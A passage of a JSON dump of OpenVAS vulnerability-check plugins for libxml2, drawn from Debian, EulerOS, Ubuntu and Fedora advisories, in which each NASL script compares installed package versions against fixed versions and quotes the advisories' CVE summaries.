that,\nwhen processed by an application using libxml2, would cause a denial-of-service\nagainst the application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.", "cvss3": {}, "published": "2016-12-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3744-1 (libxml2 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2016-4658"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703744", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703744", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3744.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3744-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703744\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\");\n script_name(\"Debian Security Advisory DSA 3744-1 (libxml2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 00:00:00 +0100 (Fri, 23 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3744.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"libxml2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 2.9.1+dfsg1-5+deb8u4.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\nWe recommend that you upgrade your libxml2 packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered\nin libxml2, a library providing support to read, modify and write XML and HTML\nfiles. A remote attacker could provide a specially crafted XML or HTML file that,\nwhen processed by an application using libxml2, would cause a denial-of-service\nagainst the application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-dbg:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-dev:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-dbg:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg:i386\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-dev:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev:i386\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3-libxml2\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3-libxml2-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:37:19", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1088)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16931", "CVE-2016-5131", "CVE-2017-16932"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181088", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1088\");\n script_version(\"2020-01-23T11:12:09+0000\");\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-16931\", \"CVE-2017-16932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:12:09 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:12:09 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1088)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1088\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1088\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libxml2' package(s) announced via the EulerOS-SA-2018-1088 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.(CVE-2016-5131)\n\nparser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\nparser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.)CVE-2017-16932)\");\n\n script_tag(name:\"affected\", value:\"'libxml2' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:39:00", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1156)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16931", "CVE-2016-5131", "CVE-2017-16932"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181156", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1156\");\n script_version(\"2020-01-23T11:15:29+0000\");\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-16931\", \"CVE-2017-16932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:15:29 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:15:29 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1156)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1156\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1156\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libxml2' package(s) announced via the EulerOS-SA-2018-1156 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.(CVE-2016-5131)\n\nparser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\nparser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.)CVE-2017-16932)\");\n\n script_tag(name:\"affected\", value:\"'libxml2' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for libxml2 USN-3235-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4448", "CVE-2016-5131", "CVE-2016-4658"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843097", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843097", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for libxml2 USN-3235-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843097\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 06:32:18 +0100 (Fri, 17 Mar 2017)\");\n script_cve_id(\"CVE-2016-4448\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for libxml2 USN-3235-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that libxml2 incorrectly\n handled format strings. If a user or automated system were tricked into opening\n a specially crafted document, an attacker could possibly cause libxml2 to crash,\n resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS,\n Ubuntu 14.04 LTS, and Ubuntu 16.04 LTS. (CVE-2016-4448) It was discovered that\n libxml2 incorrectly handled certain malformed documents. If a user or automated\n system were tricked into opening a specially crafted document, an attacker could\n cause libxml2 to crash, resulting in a denial of service, or possibly execute\n arbitrary code. (CVE-2016-4658) Nick Wellnhofer discovered that libxml2\n incorrectly handled certain malformed documents. If a user or automated system\n were tricked into opening a specially crafted document, an attacker could cause\n libxml2 to crash, resulting in a denial of service, or possibly execute\n arbitrary code. (CVE-2016-5131)\");\n script_tag(name:\"affected\", value:\"libxml2 on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3235-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3235-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-3ubuntu4.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.1+dfsg1-3ubuntu4.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.4+dfsg1-2ubuntu0.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.4+dfsg1-2ubuntu0.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.7.8.dfsg-5.1ubuntu4.17\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.7.8.dfsg-5.1ubuntu4.17\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.3+dfsg1-1ubuntu0.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.3+dfsg1-1ubuntu0.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:36:31", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1089)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16931", "CVE-2017-7375", "CVE-2017-7376", "CVE-2016-5131", "CVE-2017-16932"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181089", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1089\");\n script_version(\"2020-01-23T11:12:11+0000\");\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-16931\", \"CVE-2017-16932\", \"CVE-2017-7375\", \"CVE-2017-7376\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:12:11 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:12:11 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1089)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1089\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1089\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libxml2' package(s) announced via the EulerOS-SA-2018-1089 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.(CVE-2016-5131)\n\nparser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\nparser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.)CVE-2017-16932)\n\nA flaw in libxml2 allows remote XML entity inclusion with default parser flags (i.e., when the caller did not request entity substitution, DTD validation, external DTD subset loading, or default DTD attributes). Depending on the context, this may expose a higher-risk attack surface in libxml2 not usually reachable with default parser flags, and expose content from local files, HTTP, or FTP servers (which might be otherwise unreachable).(CVE-2017-7375)\n\nBuffer overflow in libxml2 allows remote attackers to execute arbitrary code by leveraging an incorrect limit for port values when handling redirects.(CVE-2017-7376)\");\n\n script_tag(name:\"affected\", value:\"'libxml2' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-02-15T00:00:00", "type": "openvas", "title": "Fedora Update for libxml2 FEDORA-2018-a6b59d8f78", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9049", "CVE-2017-8872", "CVE-2017-9048", "CVE-2016-5131", "CVE-2017-9047", "CVE-2016-4658", "CVE-2017-9050"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874119", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_a6b59d8f78_libxml2_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libxml2 FEDORA-2018-a6b59d8f78\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, 